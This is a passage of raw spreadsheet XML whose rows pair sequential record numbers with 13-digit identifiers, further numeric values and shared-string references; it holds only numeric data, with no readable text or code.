      </c>
      <c r="D481">
        <v>504</v>
      </c>
      <c r="E481" t="s">
        <v>14626</v>
      </c>
    </row>
    <row r="482" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A482">
        <v>1397</v>
      </c>
      <c r="B482">
        <v>8120212211307</v>
      </c>
      <c r="D482">
        <v>505</v>
      </c>
      <c r="E482" t="s">
        <v>14627</v>
      </c>
    </row>
    <row r="483" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A483">
        <v>1398</v>
      </c>
      <c r="B483">
        <v>8120312242305</v>
      </c>
      <c r="D483">
        <v>506</v>
      </c>
      <c r="E483" t="s">
        <v>14628</v>
      </c>
    </row>
    <row r="484" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A484">
        <v>1399</v>
      </c>
      <c r="B484">
        <v>8120215030627</v>
      </c>
      <c r="D484">
        <v>507</v>
      </c>
      <c r="E484" t="s">
        <v>14629</v>
      </c>
    </row>
    <row r="485" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A485">
        <v>1400</v>
      </c>
      <c r="B485">
        <v>8120218071176</v>
      </c>
      <c r="D485">
        <v>509</v>
      </c>
      <c r="E485" t="s">
        <v>14630</v>
      </c>
    </row>
    <row r="486" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A486">
        <v>1401</v>
      </c>
      <c r="B486">
        <v>8120110232884</v>
      </c>
      <c r="D486">
        <v>510</v>
      </c>
      <c r="E486" t="s">
        <v>14631</v>
      </c>
    </row>
    <row r="487" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A487">
        <v>1403</v>
      </c>
      <c r="B487">
        <v>8120017270466</v>
      </c>
      <c r="D487">
        <v>511</v>
      </c>
      <c r="E487" t="s">
        <v>14632</v>
      </c>
    </row>
    <row r="488" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A488">
        <v>1404</v>
      </c>
      <c r="B488">
        <v>8120119261776</v>
      </c>
      <c r="D488">
        <v>512</v>
      </c>
      <c r="E488" t="s">
        <v>14633</v>
      </c>
    </row>
    <row r="489" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A489">
        <v>1405</v>
      </c>
      <c r="B489">
        <v>8120204931393</v>
      </c>
      <c r="D489">
        <v>514</v>
      </c>
      <c r="E489" t="s">
        <v>14634</v>
      </c>
    </row>
    <row r="490" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A490">
        <v>1406</v>
      </c>
      <c r="B490">
        <v>8120112200778</v>
      </c>
      <c r="D490">
        <v>515</v>
      </c>
    </row>
    <row r="491" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A491">
        <v>1407</v>
      </c>
      <c r="B491">
        <v>8120003840894</v>
      </c>
      <c r="D491">
        <v>516</v>
      </c>
    </row>
    <row r="492" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A492">
        <v>1408</v>
      </c>
      <c r="B492">
        <v>8120007922978</v>
      </c>
      <c r="D492">
        <v>517</v>
      </c>
      <c r="E492" t="s">
        <v>14635</v>
      </c>
    </row>
    <row r="493" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A493">
        <v>1412</v>
      </c>
      <c r="B493">
        <v>8120002872898</v>
      </c>
      <c r="D493">
        <v>518</v>
      </c>
      <c r="E493" t="s">
        <v>14636</v>
      </c>
    </row>
    <row r="494" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A494">
        <v>1413</v>
      </c>
      <c r="B494">
        <v>9120300291252</v>
      </c>
      <c r="D494">
        <v>519</v>
      </c>
      <c r="E494" t="s">
        <v>14637</v>
      </c>
    </row>
    <row r="495" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A495">
        <v>1414</v>
      </c>
      <c r="B495">
        <v>8120219170122</v>
      </c>
      <c r="D495">
        <v>520</v>
      </c>
      <c r="E495" t="s">
        <v>14638</v>
      </c>
    </row>
    <row r="496" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A496">
        <v>1415</v>
      </c>
      <c r="B496">
        <v>8120109880334</v>
      </c>
      <c r="D496">
        <v>521</v>
      </c>
      <c r="E496" t="s">
        <v>14639</v>
      </c>
    </row>
    <row r="497" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A497">
        <v>1416</v>
      </c>
      <c r="B497">
        <v>8120015271228</v>
      </c>
      <c r="D497">
        <v>522</v>
      </c>
      <c r="E497" t="s">
        <v>14640</v>
      </c>
    </row>
    <row r="498" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A498">
        <v>1417</v>
      </c>
      <c r="B498">
        <v>8120000891333</v>
      </c>
      <c r="D498">
        <v>523</v>
      </c>
      <c r="E498" t="s">
        <v>14641</v>
      </c>
    </row>
    <row r="499" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A499">
        <v>1418</v>
      </c>
      <c r="B499">
        <v>8120003822374</v>
      </c>
      <c r="D499">
        <v>524</v>
      </c>
      <c r="E499" t="s">
        <v>14642</v>
      </c>
    </row>
    <row r="500" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A500">
        <v>1419</v>
      </c>
      <c r="B500">
        <v>9120304110683</v>
      </c>
      <c r="D500">
        <v>525</v>
      </c>
      <c r="E500" t="s">
        <v>14643</v>
      </c>
    </row>
    <row r="501" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A501">
        <v>1420</v>
      </c>
      <c r="B501">
        <v>8120014032593</v>
      </c>
      <c r="D501">
        <v>526</v>
      </c>
      <c r="E501" t="s">
        <v>14644</v>
      </c>
    </row>
    <row r="502" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A502">
        <v>1421</v>
      </c>
      <c r="B502">
        <v>8120101841565</v>
      </c>
      <c r="D502">
        <v>527</v>
      </c>
      <c r="E502" t="s">
        <v>14645</v>
      </c>
    </row>
    <row r="503" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A503">
        <v>1424</v>
      </c>
      <c r="B503">
        <v>220003351347</v>
      </c>
      <c r="D503">
        <v>528</v>
      </c>
      <c r="E503" t="s">
        <v>14646</v>
      </c>
    </row>
    <row r="504" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A504">
        <v>1426</v>
      </c>
      <c r="D504">
        <v>529</v>
      </c>
      <c r="E504" t="s">
        <v>14647</v>
      </c>
    </row>
    <row r="505" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A505">
        <v>1429</v>
      </c>
      <c r="B505">
        <v>8120203980159</v>
      </c>
      <c r="D505">
        <v>2785</v>
      </c>
      <c r="E505" t="s">
        <v>14648</v>
      </c>
    </row>
    <row r="506" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A506">
        <v>1430</v>
      </c>
      <c r="B506">
        <v>8120107910232</v>
      </c>
      <c r="D506">
        <v>531</v>
      </c>
      <c r="E506" t="s">
        <v>14649</v>
      </c>
    </row>
    <row r="507" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A507">
        <v>1431</v>
      </c>
      <c r="B507">
        <v>8120100813203</v>
      </c>
      <c r="D507">
        <v>532</v>
      </c>
      <c r="E507" t="s">
        <v>14650</v>
      </c>
    </row>
    <row r="508" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A508">
        <v>1433</v>
      </c>
      <c r="B508">
        <v>8120011181279</v>
      </c>
      <c r="D508">
        <v>533</v>
      </c>
      <c r="E508" t="s">
        <v>14651</v>
      </c>
    </row>
    <row r="509" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A509">
        <v>1434</v>
      </c>
      <c r="B509">
        <v>8120000891118</v>
      </c>
      <c r="D509">
        <v>534</v>
      </c>
      <c r="E509" t="s">
        <v>14652</v>
      </c>
    </row>
    <row r="510" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A510">
        <v>1435</v>
      </c>
      <c r="B510">
        <v>8120311100056</v>
      </c>
      <c r="D510">
        <v>536</v>
      </c>
      <c r="E510" t="s">
        <v>14653</v>
      </c>
    </row>
    <row r="511" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A511">
        <v>1437</v>
      </c>
      <c r="B511">
        <v>8120010270841</v>
      </c>
      <c r="D511">
        <v>537</v>
      </c>
      <c r="E511" t="s">
        <v>14654</v>
      </c>
    </row>
    <row r="512" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A512">
        <v>1438</v>
      </c>
      <c r="B512">
        <v>8120211160919</v>
      </c>
      <c r="D512">
        <v>538</v>
      </c>
      <c r="E512" t="s">
        <v>14655</v>
      </c>
    </row>
    <row r="513" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A513">
        <v>1441</v>
      </c>
      <c r="B513">
        <v>8120211160919</v>
      </c>
      <c r="D513">
        <v>539</v>
      </c>
      <c r="E513" t="s">
        <v>14656</v>
      </c>
    </row>
    <row r="514" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A514">
        <v>1442</v>
      </c>
      <c r="D514">
        <v>540</v>
      </c>
      <c r="E514" t="s">
        <v>14657</v>
      </c>
    </row>
    <row r="515" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A515">
        <v>1443</v>
      </c>
      <c r="B515">
        <v>8120212231208</v>
      </c>
      <c r="D515">
        <v>541</v>
      </c>
      <c r="E515" t="s">
        <v>14581</v>
      </c>
    </row>
    <row r="516" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A516">
        <v>1444</v>
      </c>
      <c r="B516">
        <v>8120003712405</v>
      </c>
      <c r="D516">
        <v>542</v>
      </c>
      <c r="E516" t="s">
        <v>14658</v>
      </c>
    </row>
    <row r="517" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A517">
        <v>1445</v>
      </c>
      <c r="B517">
        <v>8120014021253</v>
      </c>
      <c r="D517">
        <v>543</v>
      </c>
      <c r="E517" t="s">
        <v>14659</v>
      </c>
    </row>
    <row r="518" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A518">
        <v>1446</v>
      </c>
      <c r="B518">
        <v>8120212231493</v>
      </c>
      <c r="D518">
        <v>544</v>
      </c>
      <c r="E518" t="s">
        <v>14660</v>
      </c>
    </row>
    <row r="519" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A519">
        <v>1447</v>
      </c>
      <c r="B519">
        <v>8120111260076</v>
      </c>
      <c r="D519">
        <v>545</v>
      </c>
      <c r="E519" t="s">
        <v>14661</v>
      </c>
    </row>
    <row r="520" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A520">
        <v>1448</v>
      </c>
      <c r="B520">
        <v>8120312271421</v>
      </c>
      <c r="D520">
        <v>546</v>
      </c>
      <c r="E520" t="s">
        <v>14662</v>
      </c>
    </row>
    <row r="521" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A521">
        <v>1449</v>
      </c>
      <c r="B521">
        <v>8120118000784</v>
      </c>
      <c r="D521">
        <v>547</v>
      </c>
      <c r="E521" t="s">
        <v>14663</v>
      </c>
    </row>
    <row r="522" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A522">
        <v>1452</v>
      </c>
      <c r="B522">
        <v>8120116132733</v>
      </c>
      <c r="D522">
        <v>548</v>
      </c>
      <c r="E522" t="s">
        <v>14664</v>
      </c>
    </row>
    <row r="523" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A523">
        <v>1453</v>
      </c>
      <c r="B523">
        <v>9120105251251</v>
      </c>
      <c r="D523">
        <v>549</v>
      </c>
      <c r="E523" t="s">
        <v>14665</v>
      </c>
    </row>
    <row r="524" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A524">
        <v>1454</v>
      </c>
      <c r="B524">
        <v>8120003713913</v>
      </c>
      <c r="D524">
        <v>550</v>
      </c>
      <c r="E524" t="s">
        <v>14666</v>
      </c>
    </row>
    <row r="525" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A525">
        <v>1455</v>
      </c>
      <c r="B525">
        <v>9120105261432</v>
      </c>
      <c r="D525">
        <v>551</v>
      </c>
      <c r="E525" t="s">
        <v>14667</v>
      </c>
    </row>
    <row r="526" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A526">
        <v>1459</v>
      </c>
      <c r="B526">
        <v>9120313070936</v>
      </c>
      <c r="D526">
        <v>552</v>
      </c>
      <c r="E526" t="s">
        <v>14668</v>
      </c>
    </row>
    <row r="527" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A527">
        <v>1460</v>
      </c>
      <c r="B527">
        <v>8120113262679</v>
      </c>
      <c r="D527">
        <v>555</v>
      </c>
      <c r="E527" t="s">
        <v>14669</v>
      </c>
    </row>
    <row r="528" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A528">
        <v>1461</v>
      </c>
      <c r="B528">
        <v>8120100992362</v>
      </c>
      <c r="D528">
        <v>556</v>
      </c>
      <c r="E528" t="s">
        <v>14670</v>
      </c>
    </row>
    <row r="529" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A529">
        <v>1462</v>
      </c>
      <c r="B529">
        <v>8120014151382</v>
      </c>
      <c r="D529">
        <v>557</v>
      </c>
      <c r="E529" t="s">
        <v>14671</v>
      </c>
    </row>
    <row r="530" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A530">
        <v>1463</v>
      </c>
      <c r="B530">
        <v>8120109830439</v>
      </c>
      <c r="D530">
        <v>558</v>
      </c>
      <c r="E530" t="s">
        <v>14672</v>
      </c>
    </row>
    <row r="531" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A531">
        <v>1464</v>
      </c>
      <c r="B531">
        <v>9120200750341</v>
      </c>
      <c r="D531">
        <v>559</v>
      </c>
      <c r="E531" t="s">
        <v>14673</v>
      </c>
    </row>
    <row r="532" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A532">
        <v>1465</v>
      </c>
      <c r="B532">
        <v>8120217150963</v>
      </c>
      <c r="D532">
        <v>560</v>
      </c>
      <c r="E532" t="s">
        <v>14674</v>
      </c>
    </row>
    <row r="533" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A533">
        <v>1466</v>
      </c>
      <c r="B533">
        <v>8120109881458</v>
      </c>
      <c r="D533">
        <v>561</v>
      </c>
      <c r="E533" t="s">
        <v>14675</v>
      </c>
    </row>
    <row r="534" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A534">
        <v>1467</v>
      </c>
      <c r="D534">
        <v>563</v>
      </c>
      <c r="E534" t="s">
        <v>14676</v>
      </c>
    </row>
    <row r="535" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A535">
        <v>1468</v>
      </c>
      <c r="B535">
        <v>8120019040792</v>
      </c>
      <c r="D535">
        <v>564</v>
      </c>
      <c r="E535" t="s">
        <v>14677</v>
      </c>
    </row>
    <row r="536" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A536">
        <v>1469</v>
      </c>
      <c r="B536">
        <v>8120206962906</v>
      </c>
      <c r="D536">
        <v>565</v>
      </c>
      <c r="E536" t="s">
        <v>14678</v>
      </c>
    </row>
    <row r="537" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A537">
        <v>1470</v>
      </c>
      <c r="B537">
        <v>8120017242206</v>
      </c>
      <c r="D537">
        <v>566</v>
      </c>
      <c r="E537" t="s">
        <v>14679</v>
      </c>
    </row>
    <row r="538" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A538">
        <v>1471</v>
      </c>
      <c r="B538">
        <v>9120301260912</v>
      </c>
      <c r="D538">
        <v>567</v>
      </c>
      <c r="E538" t="s">
        <v>14680</v>
      </c>
    </row>
    <row r="539" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A539">
        <v>1472</v>
      </c>
      <c r="B539">
        <v>8120019062355</v>
      </c>
      <c r="D539">
        <v>568</v>
      </c>
      <c r="E539" t="s">
        <v>14655</v>
      </c>
    </row>
    <row r="540" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A540">
        <v>1473</v>
      </c>
      <c r="B540">
        <v>9120109230579</v>
      </c>
      <c r="D540">
        <v>569</v>
      </c>
      <c r="E540" t="s">
        <v>14681</v>
      </c>
    </row>
    <row r="541" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A541">
        <v>1474</v>
      </c>
      <c r="B541">
        <v>8120115232709</v>
      </c>
      <c r="D541">
        <v>570</v>
      </c>
      <c r="E541" t="s">
        <v>14682</v>
      </c>
    </row>
    <row r="542" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A542">
        <v>1475</v>
      </c>
      <c r="B542">
        <v>8120103911771</v>
      </c>
      <c r="D542">
        <v>571</v>
      </c>
      <c r="E542" t="s">
        <v>14683</v>
      </c>
    </row>
    <row r="543" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A543">
        <v>1476</v>
      </c>
      <c r="B543">
        <v>8120202980946</v>
      </c>
      <c r="D543">
        <v>572</v>
      </c>
      <c r="E543" t="s">
        <v>14684</v>
      </c>
    </row>
    <row r="544" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A544">
        <v>1477</v>
      </c>
      <c r="B544">
        <v>8120115282786</v>
      </c>
      <c r="D544">
        <v>573</v>
      </c>
      <c r="E544" t="s">
        <v>14685</v>
      </c>
    </row>
    <row r="545" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A545">
        <v>1478</v>
      </c>
      <c r="B545">
        <v>8120014200983</v>
      </c>
      <c r="D545">
        <v>574</v>
      </c>
      <c r="E545" t="s">
        <v>14686</v>
      </c>
    </row>
    <row r="546" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A546">
        <v>1479</v>
      </c>
      <c r="B546">
        <v>9120409990928</v>
      </c>
      <c r="D546">
        <v>575</v>
      </c>
      <c r="E546" t="s">
        <v>14687</v>
      </c>
    </row>
    <row r="547" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A547">
        <v>1481</v>
      </c>
      <c r="D547">
        <v>576</v>
      </c>
      <c r="E547" t="s">
        <v>14688</v>
      </c>
    </row>
    <row r="548" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A548">
        <v>1483</v>
      </c>
      <c r="B548">
        <v>8120003990261</v>
      </c>
      <c r="D548">
        <v>577</v>
      </c>
      <c r="E548" t="s">
        <v>14689</v>
      </c>
    </row>
    <row r="549" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A549">
        <v>1484</v>
      </c>
      <c r="D549">
        <v>578</v>
      </c>
      <c r="E549" t="s">
        <v>14690</v>
      </c>
    </row>
    <row r="550" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A550">
        <v>1485</v>
      </c>
      <c r="B550">
        <v>8120018251826</v>
      </c>
      <c r="D550">
        <v>580</v>
      </c>
      <c r="E550" t="s">
        <v>14691</v>
      </c>
    </row>
    <row r="551" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A551">
        <v>1487</v>
      </c>
      <c r="B551">
        <v>8120001880038</v>
      </c>
      <c r="D551">
        <v>581</v>
      </c>
      <c r="E551" t="s">
        <v>14692</v>
      </c>
    </row>
    <row r="552" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A552">
        <v>1489</v>
      </c>
      <c r="B552">
        <v>8120112012544</v>
      </c>
      <c r="D552">
        <v>582</v>
      </c>
      <c r="E552" t="s">
        <v>14693</v>
      </c>
    </row>
    <row r="553" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A553">
        <v>1490</v>
      </c>
      <c r="B553">
        <v>8120018002842</v>
      </c>
      <c r="D553">
        <v>583</v>
      </c>
      <c r="E553" t="s">
        <v>14694</v>
      </c>
    </row>
    <row r="554" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A554">
        <v>1492</v>
      </c>
      <c r="B554">
        <v>8120200921439</v>
      </c>
      <c r="D554">
        <v>584</v>
      </c>
      <c r="E554" t="s">
        <v>14695</v>
      </c>
    </row>
    <row r="555" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A555">
        <v>1494</v>
      </c>
      <c r="B555">
        <v>8120203980159</v>
      </c>
      <c r="D555">
        <v>585</v>
      </c>
      <c r="E555" t="s">
        <v>14696</v>
      </c>
    </row>
    <row r="556" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A556">
        <v>1496</v>
      </c>
      <c r="B556">
        <v>9120103190622</v>
      </c>
      <c r="D556">
        <v>586</v>
      </c>
      <c r="E556" t="s">
        <v>14697</v>
      </c>
    </row>
    <row r="557" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A557">
        <v>1497</v>
      </c>
      <c r="B557">
        <v>8120004920936</v>
      </c>
      <c r="D557">
        <v>588</v>
      </c>
      <c r="E557" t="s">
        <v>14698</v>
      </c>
    </row>
    <row r="558" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A558">
        <v>1498</v>
      </c>
      <c r="B558">
        <v>8120111131253</v>
      </c>
      <c r="D558">
        <v>589</v>
      </c>
      <c r="E558" t="s">
        <v>14699</v>
      </c>
    </row>
    <row r="559" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A559">
        <v>1499</v>
      </c>
      <c r="B559">
        <v>8120015152518</v>
      </c>
      <c r="D559">
        <v>590</v>
      </c>
      <c r="E559" t="s">
        <v>14700</v>
      </c>
    </row>
    <row r="560" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A560">
        <v>1500</v>
      </c>
      <c r="B560">
        <v>9120305810976</v>
      </c>
      <c r="D560">
        <v>591</v>
      </c>
      <c r="E560" t="s">
        <v>14701</v>
      </c>
    </row>
    <row r="561" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A561">
        <v>1501</v>
      </c>
      <c r="D561">
        <v>592</v>
      </c>
      <c r="E561" t="s">
        <v>14702</v>
      </c>
    </row>
    <row r="562" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A562">
        <v>1503</v>
      </c>
      <c r="B562">
        <v>8120002772785</v>
      </c>
      <c r="D562">
        <v>593</v>
      </c>
      <c r="E562" t="s">
        <v>14703</v>
      </c>
    </row>
    <row r="563" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A563">
        <v>1506</v>
      </c>
      <c r="B563">
        <v>9120109112859</v>
      </c>
      <c r="D563">
        <v>594</v>
      </c>
      <c r="E563" t="s">
        <v>14704</v>
      </c>
    </row>
    <row r="564" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A564">
        <v>1507</v>
      </c>
      <c r="B564">
        <v>8120101823407</v>
      </c>
      <c r="D564">
        <v>595</v>
      </c>
      <c r="E564" t="s">
        <v>14691</v>
      </c>
    </row>
    <row r="565" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A565">
        <v>1508</v>
      </c>
      <c r="B565">
        <v>8120101841565</v>
      </c>
      <c r="D565">
        <v>596</v>
      </c>
      <c r="E565" t="s">
        <v>14705</v>
      </c>
    </row>
    <row r="566" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A566">
        <v>1509</v>
      </c>
      <c r="B566">
        <v>8120200802437</v>
      </c>
      <c r="D566">
        <v>597</v>
      </c>
      <c r="E566" t="s">
        <v>14706</v>
      </c>
    </row>
    <row r="567" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A567">
        <v>1510</v>
      </c>
      <c r="B567">
        <v>8120101802538</v>
      </c>
      <c r="D567">
        <v>599</v>
      </c>
      <c r="E567" t="s">
        <v>14707</v>
      </c>
    </row>
    <row r="568" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A568">
        <v>1512</v>
      </c>
      <c r="B568">
        <v>9120100882563</v>
      </c>
      <c r="D568">
        <v>600</v>
      </c>
      <c r="E568" t="s">
        <v>14708</v>
      </c>
    </row>
    <row r="569" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A569">
        <v>1513</v>
      </c>
      <c r="B569">
        <v>9120209151753</v>
      </c>
      <c r="D569">
        <v>601</v>
      </c>
      <c r="E569" t="s">
        <v>14709</v>
      </c>
    </row>
    <row r="570" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A570">
        <v>1514</v>
      </c>
      <c r="B570">
        <v>8120013162091</v>
      </c>
      <c r="D570">
        <v>602</v>
      </c>
      <c r="E570" t="s">
        <v>14710</v>
      </c>
    </row>
    <row r="571" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A571">
        <v>1515</v>
      </c>
      <c r="B571">
        <v>8120004870536</v>
      </c>
      <c r="D571">
        <v>603</v>
      </c>
      <c r="E571" t="s">
        <v>14711</v>
      </c>
    </row>
    <row r="572" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A572">
        <v>1517</v>
      </c>
      <c r="B572">
        <v>1248000201035</v>
      </c>
      <c r="D572">
        <v>604</v>
      </c>
      <c r="E572" t="s">
        <v>14712</v>
      </c>
    </row>
    <row r="573" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A573">
        <v>1518</v>
      </c>
      <c r="B573">
        <v>9120006132686</v>
      </c>
      <c r="D573">
        <v>605</v>
      </c>
      <c r="E573" t="s">
        <v>14712</v>
      </c>
    </row>
    <row r="574" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A574">
        <v>1519</v>
      </c>
      <c r="B574">
        <v>8120108911541</v>
      </c>
      <c r="D574">
        <v>606</v>
      </c>
      <c r="E574" t="s">
        <v>14713</v>
      </c>
    </row>
    <row r="575" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A575">
        <v>1520</v>
      </c>
      <c r="B575">
        <v>9120007190831</v>
      </c>
      <c r="D575">
        <v>608</v>
      </c>
      <c r="E575" t="s">
        <v>14714</v>
      </c>
    </row>
    <row r="576" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A576">
        <v>1522</v>
      </c>
      <c r="B576">
        <v>8120118031406</v>
      </c>
      <c r="D576">
        <v>609</v>
      </c>
      <c r="E576" t="s">
        <v>14715</v>
      </c>
    </row>
    <row r="577" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A577">
        <v>1523</v>
      </c>
      <c r="B577">
        <v>9120208161854</v>
      </c>
      <c r="D577">
        <v>610</v>
      </c>
      <c r="E577" t="s">
        <v>14716</v>
      </c>
    </row>
    <row r="578" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A578">
        <v>1524</v>
      </c>
      <c r="B578">
        <v>8120017150226</v>
      </c>
      <c r="D578">
        <v>611</v>
      </c>
      <c r="E578" t="s">
        <v>14717</v>
      </c>
    </row>
    <row r="579" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A579">
        <v>1525</v>
      </c>
      <c r="B579">
        <v>8120107860835</v>
      </c>
      <c r="D579">
        <v>612</v>
      </c>
      <c r="E579" t="s">
        <v>14718</v>
      </c>
    </row>
    <row r="580" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A580">
        <v>1526</v>
      </c>
      <c r="B580">
        <v>8120119103701</v>
      </c>
      <c r="D580">
        <v>613</v>
      </c>
      <c r="E580" t="s">
        <v>14719</v>
      </c>
    </row>
    <row r="581" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A581">
        <v>1527</v>
      </c>
      <c r="B581">
        <v>8120211222064</v>
      </c>
      <c r="D581">
        <v>4759</v>
      </c>
      <c r="E581" t="s">
        <v>14720</v>
      </c>
    </row>
    <row r="582" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A582">
        <v>2367</v>
      </c>
      <c r="B582">
        <v>8120005861765</v>
      </c>
      <c r="D582">
        <v>615</v>
      </c>
      <c r="E582" t="s">
        <v>14721</v>
      </c>
    </row>
    <row r="583" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A583">
        <v>1529</v>
      </c>
      <c r="B583">
        <v>8120013182251</v>
      </c>
      <c r="D583">
        <v>616</v>
      </c>
      <c r="E583" t="s">
        <v>14722</v>
      </c>
    </row>
    <row r="584" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A584">
        <v>1530</v>
      </c>
      <c r="B584">
        <v>8120004842752</v>
      </c>
      <c r="D584">
        <v>617</v>
      </c>
      <c r="E584" t="s">
        <v>14652</v>
      </c>
    </row>
    <row r="585" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A585">
        <v>1531</v>
      </c>
      <c r="B585">
        <v>9120003121433</v>
      </c>
      <c r="D585">
        <v>618</v>
      </c>
      <c r="E585" t="s">
        <v>14723</v>
      </c>
    </row>
    <row r="586" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A586">
        <v>1533</v>
      </c>
      <c r="D586">
        <v>619</v>
      </c>
    </row>
    <row r="587" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A587">
        <v>1535</v>
      </c>
      <c r="B587">
        <v>8120315002245</v>
      </c>
      <c r="D587">
        <v>620</v>
      </c>
      <c r="E587" t="s">
        <v>14724</v>
      </c>
    </row>
    <row r="588" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A588">
        <v>1536</v>
      </c>
      <c r="B588">
        <v>9120100760951</v>
      </c>
      <c r="D588">
        <v>621</v>
      </c>
      <c r="E588" t="s">
        <v>14725</v>
      </c>
    </row>
    <row r="589" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A589">
        <v>1537</v>
      </c>
      <c r="B589">
        <v>9120207160896</v>
      </c>
      <c r="D589">
        <v>622</v>
      </c>
      <c r="E589" t="s">
        <v>14726</v>
      </c>
    </row>
    <row r="590" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A590">
        <v>1539</v>
      </c>
      <c r="B590">
        <v>9120003180552</v>
      </c>
      <c r="D590">
        <v>623</v>
      </c>
      <c r="E590" t="s">
        <v>14727</v>
      </c>
    </row>
    <row r="591" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A591">
        <v>1540</v>
      </c>
      <c r="B591">
        <v>8120208880797</v>
      </c>
      <c r="D591">
        <v>624</v>
      </c>
      <c r="E591" t="s">
        <v>14728</v>
      </c>
    </row>
    <row r="592" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A592">
        <v>1542</v>
      </c>
      <c r="B592">
        <v>8120202742455</v>
      </c>
      <c r="D592">
        <v>625</v>
      </c>
      <c r="E592" t="s">
        <v>14729</v>
      </c>
    </row>
